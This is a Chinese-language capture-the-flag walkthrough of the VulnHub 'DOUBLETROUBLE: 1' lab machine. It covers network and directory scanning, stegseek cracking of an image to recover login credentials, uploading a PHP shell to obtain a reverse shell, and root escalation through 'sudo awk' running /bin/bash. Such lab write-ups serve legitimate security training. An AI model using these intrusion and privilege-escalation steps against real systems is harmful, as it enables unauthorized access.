vulnhub靶场----＞DOUBLETROUBLE: 1

详细思路

`知识点`
1.网段探测
2.nmap扫描
3.目录扫描
4.隐写
5.上传木马文件
6.awk提权

`知识点`

图片隐写----->steghide
密码爆破----->stegseek
awk提权------>sudo awk 'BEGIN {system("/bin/bash")}'

1.网段探测

kali:192.168.0.131
靶机：192.168.0.134

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.0.131
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1     b8:3a:08:3b:f9:30       Tenda Technology Co.,Ltd.Dongguan branch
192.168.0.130   7c:b5:66:a5:f0:a5       Intel Corporate
192.168.0.134   08:00:27:45:31:d4       PCS Systemtechnik GmbH
192.168.0.128   9e:74:7d:ae:04:f7       (Unknown: locally administered)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 1.998 seconds (128.13 hosts/sec). 4 responded

2.nmap扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -O -sC 192.168.0.134 --min-rate 10000
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-22 00:54 EST
Nmap scan report for 192.168.0.134 (192.168.0.134)
Host is up (0.0056s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6afed61723cb90792bb12d3753974658 (RSA)
|   256 5bc468d18959d748b096f311871c08ac (ECDSA)
|_  256 613966881d8ff1d040611e99c51a1ff4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: qdPM | Login
MAC Address: 08:00:27:45:31:D4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.35 seconds

开放80端口，apache服务，登陆页面，弱密码爆破无果
在这里插入图片描述

3.目录扫描

┌──(root㉿kali)-[~]
└─# dirsearch -u "http://192.168.0.134" -x 403,500

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )
                                                                                        
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /root/reports/http_192.168.0.134/_24-02-22_00-58-27.txt

Target: http://192.168.0.134/

[00:58:27] Starting:                                                                    
[00:58:28] 301 -  311B  - /js  ->  http://192.168.0.134/js/                 
[00:58:43] 301 -  316B  - /backups  ->  http://192.168.0.134/backups/       
[00:58:43] 200 -  407B  - /backups/                                         
[00:58:45] 200 -    0B  - /check.php                                        
[00:58:47] 301 -  313B  - /core  ->  http://192.168.0.134/core/             
[00:58:47] 301 -  312B  - /css  ->  http://192.168.0.134/css/               
[00:58:51] 200 -  894B  - /favicon.ico                                      
[00:58:54] 200 -  648B  - /images/                                          
[00:58:54] 301 -  315B  - /images  ->  http://192.168.0.134/images/         
[00:58:54] 200 -    2KB - /index.php                                        
[00:58:55] 200 -    2KB - /index.php/login/                                 
[00:58:55] 301 -  316B  - /install  ->  http://192.168.0.134/install/       
[00:58:55] 200 -  762B  - /install/index.php?upgrade/                       
[00:58:55] 200 -  762B  - /install/                                         
[00:58:56] 200 -  607B  - /js/                                              
[00:59:07] 200 -  338B  - /readme.txt                                       
[00:59:08] 200 -   26B  - /robots.txt                                       
[00:59:09] 301 -  315B  - /secret  ->  http://192.168.0.134/secret/         
[00:59:09] 200 -  461B  - /secret/                                          
[00:59:14] 200 -  502B  - /template/                                        
[00:59:14] 301 -  317B  - /template  ->  http://192.168.0.134/template/     
[00:59:16] 301 -  316B  - /uploads  ->  http://192.168.0.134/uploads/       
[00:59:16] 200 -  476B  - /uploads/
                                                                             
Task Completed

在 /secret目录下，发现了一个可疑的图片（因为名字和靶机一样，可能是提示）

在这里插入图片描述

4.隐写

steghide 是一个用于隐藏和提取信息的命令行工具，通常用于隐写术，将数据隐藏在图像和音频文件中
在这里插入图片描述
需要密码，使用stegseek爆破
stegseek 是一个用于在图片中查找可能存在的隐藏信息的工具。它通过尝试不同的密码组合来解密嵌入在图像中的信息

┌──(root㉿kali)-[~/kali/vulnhub/doublerouble]
└─# stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt -xf out         
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "92camaro"       
[i] Original filename: "creds.txt".
[i] Extracting to "out".                                                                         
┌──(root㉿kali)-[~/kali/vulnhub/doublerouble]
└─# cat out
otisrush@localhost.com
otis666                                                                                        

得到账号密码，登陆

5.上传木马文件

进入后台，第一时间找可以修改的php.页面或者可以上传恶意文件的地方，右上角，修改个人信息中，可以上传php文件，虽然上传后报错，但是在/uploads/user目录下，可以看到上传成功

在这里插入图片描述

https://www.revshells.com/
自动生成shell，很方便

在这里插入图片描述 反弹成功

6.awk提权

www-data@doubletrouble:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on doubletrouble:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on doubletrouble:
    (ALL : ALL) NOPASSWD: /usr/bin/awk
www-data@doubletrouble:/$ sudo awk 'BEGIN {system("/bin/bash")}'
sudo awk 'BEGIN {system("/bin/bash")}'
id
uid=0(root) gid=0(root) groups=0(root)

在这里插入图片描述
https://gtfobins.github.io/gtfobins/awk/